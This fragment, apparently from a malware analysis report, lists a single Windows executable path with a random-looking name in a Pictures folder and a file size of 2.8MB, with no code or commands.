            • \Users\Admin\Pictures\h0leOmUjjNKQgXZ4Ub4iSUF3.exe

              Filesize

              2.8MB
